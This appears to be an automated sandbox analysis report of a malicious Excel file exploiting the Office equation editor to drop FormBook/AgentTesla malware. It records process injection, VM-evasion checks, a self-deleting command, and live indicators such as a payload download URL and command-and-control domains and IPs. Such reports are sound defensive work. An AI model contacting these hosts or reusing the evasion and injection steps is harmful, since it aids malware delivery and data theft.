              Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.cs Base64 encoded string
              Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string
              Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string
              Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string
              Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string
              Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.cs Base64 encoded string
              Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/8@6/4
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Booking.xlsx
              Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\vkakGWsQh
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA2D.tmp
              Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
              Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: Booking.xlsx ReversingLabs: Detection: 23%
              Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
              Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: Booking.xlsx Static file information: File size 2512384 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
              Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
              Source: Booking.xlsx Initial sample: OLE indicators vbamacros = False
              Source: Booking.xlsx Initial sample: OLE indicators encrypted = True

              Data Obfuscation:

              .NET source code contains potential unpacker
              Source: svchost[1].2.dr, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.vbc.exe.cf0000.2.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 6.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 6.2.vbc.exe.cf0000.4.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\Public\vbc.exe Code function: 4_2_003BA0DC push edi; iretd 4_2_003BA0DF
              Source: C:\Users\Public\vbc.exe Code function: 6_2_00417867 push edx; retf 6_2_00417869
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B124 push 423E369Ah; iretd 6_2_0041B12B
              Source: C:\Users\Public\vbc.exe Code function: 6_2_00416625 push ds; retf 6_2_00416626
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041DF6E push ds; ret 6_2_0041DF77
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
              Source: C:\Users\Public\vbc.exe Code function: 6_2_00410FA6 push ebx; ret 6_2_00410FA7
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0095DFA1 push ecx; ret 6_2_0095DFB4
              Source: C:\Users\Public\vbc.exe Code function: 6_2_003DE3E6 pushad ; ret 6_2_003DE3E7
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DDFA1 push ecx; ret 8_2_021DDFB4
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DB124 push 423E369Ah; iretd 8_2_000DB12B
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D6625 push ds; retf 8_2_000D6626
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D7867 push edx; retf 8_2_000D7869
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCEB5 push eax; ret 8_2_000DCF08
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF0B push eax; ret 8_2_000DCF72
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF02 push eax; ret 8_2_000DCF08
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF6C push eax; ret 8_2_000DCF72
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DDF6E push ds; ret 8_2_000DDF77
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D0FA6 push ebx; ret 8_2_000D0FA7
              Source: initial sample Static PE information: section name: .text entropy: 7.61467077394
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]Jump to dropped file

              Boot Survival:

              Drops PE files to the user root directory
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

              Hooking and other Techniques for Hiding and Protection:

              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE8
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: Booking.xlsx Stream path 'EncryptedPackage' entropy: 7.9999180457 (max. 8.0)

              Malware Analysis System Evasion:

              Yara detected AntiVM_3
              Source: Yara match File source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY
              Source: Yara match File source: 4.2.vbc.exe.2342320.3.raw.unpack, type: UNPACKEDPE
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
              Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
              Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
              Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2924 Thread sleep time: -360000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2920 Thread sleep time: -104858s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2448 Thread sleep time: -180000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2448 Thread sleep time: -60000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2484 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\explorer.exe TID: 552 Thread sleep time: -36000s >= -30000s
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2264 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\explorer.exe Last function: Thread delayed
              Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools48*m\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: vmware
              Source: explorer.exe, 00000007.00000000.2192413484.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: *m"SOFTWARE\VMware, Inc.\VMware Tools
              Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmp Binary or memory string: VMWARE
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools
              Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
              Source: explorer.exe, 00000007.00000000.2185690395.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
              Source: C:\Users\Public\vbc.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
              Source: C:\Users\Public\vbc.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
              Source: C:\Users\Public\vbc.exe Code function: 6_2_009626F8 mov eax, dword ptr fs:[00000030h] 6_2_009626F8
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E26F8 mov eax, dword ptr fs:[00000030h] 8_2_021E26F8
              Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
              Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
              Source: C:\Windows\explorer.exe Network Connect: 81.169.145.165 80
              Injects a PE file into a foreign processes
              Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
              Maps a DLL or memory area into another process
              Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 1388
              Queues an APC in another process (thread injection)
              Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
              Sample uses process hollowing technique
              Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DA0000
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
              Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected FormBook
              Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              Yara detected FormBook
              Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Spearphishing Link 1 | Windows Management Instrumentation 1 | Path Interception | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | Credential API Hooking 1 | System Network Connections Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 14 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 612 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 42 | Security Account Manager | System Information Discovery 113 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 13 | NTDS | Security Software Discovery 431 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection 1 | LSA Secrets | Virtualization/Sandbox Evasion 14 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 121 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 14 | Proc Filesystem | System Network Configuration Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 612 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

              Behavior Graph

              Behavior Graph ID: 356846 Sample: Booking.xlsx Startdate: 23/02/2021 Architecture: WINDOWS Score: 100
              Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 19 other signatures
              Sample started: EQNEDT32.EXE, EXCEL.EXE

              EQNEDT32.EXE
              • DNS/IP: thdyworkfinerainbotm.dns.army 103.141.138.118, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam
              • DNS/IP: ow.ly 54.67.120.65, 49165, 80 AMAZON-02US United States
              • Dropped: C:\Users\user\AppData\Local\...\svchost[1], PE32
              • Dropped: C:\Users\Public\vbc.exe, PE32
              • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              • Started: vbc.exe

              EXCEL.EXE
              • Dropped: C:\Users\user\Desktop\~$Booking.xlsx, data

              vbc.exe (started by EQNEDT32.EXE)
              • Signature: Multi AV Scanner detection for dropped file
              • Signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              • Signature: Tries to detect virtualization through RDTSC time measurements
              • Signature: Injects a PE file into a foreign processes
              • Started: vbc.exe, vbc.exe

              vbc.exe (started by vbc.exe)
              • Signature: Modifies the context of a thread in another process (thread injection)
              • Signature: Maps a DLL or memory area into another process
              • Signature: Sample uses process hollowing technique
              • Signature: Queues an APC in another process (thread injection)
              • Injected: explorer.exe

              explorer.exe
              • DNS/IP: tiwapay.com 81.169.145.165, 49168, 80 STRATOSTRATOAGDE Germany
              • DNS/IP: jtelitetraining.com 160.153.136.3, 49167, 80 GODADDY-AMSDE United States
              • DNS/IP: 2 other IPs or domains
              • Signature: System process connects to network (likely due to code injection or exploit)
              • Started: NETSTAT.EXE

              NETSTAT.EXE
              • Signature: Modifies the context of a thread in another process (thread injection)
              • Signature: Maps a DLL or memory area into another process
              • Signature: Tries to detect virtualization through RDTSC time measurements
              • Started: cmd.exe

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              Booking.xlsx | 23% | ReversingLabs | Win32.Exploit.CVE-2017-11882

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1] | 15% | ReversingLabs | Win32.Trojan.AgentTesla
              C:\Users\Public\vbc.exe | 15% | ReversingLabs | Win32.Trojan.AgentTesla

              Unpacked PE Files

              Source | Detection | Scanner | Label
              6.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              http://www.asharqalawsat.com/0%URL Reputationsafe
              http://www.asharqalawsat.com/0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite100%Avira URL Cloudmalware
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ow.ly | 54.67.120.65 | true | false | | high
jtelitetraining.com | 160.153.136.3 | true | true | | unknown
thdyworkfinerainbotm.dns.army | 103.141.138.118 | true | false | | unknown
tiwapay.com | 81.169.145.165 | true | true | | unknown
www.jtelitetraining.com | unknown | unknown | true | | unknown
www.tiwapay.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite | true | Avira URL Cloud: malware | unknown

                          URLs from Memory and Binaries

                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
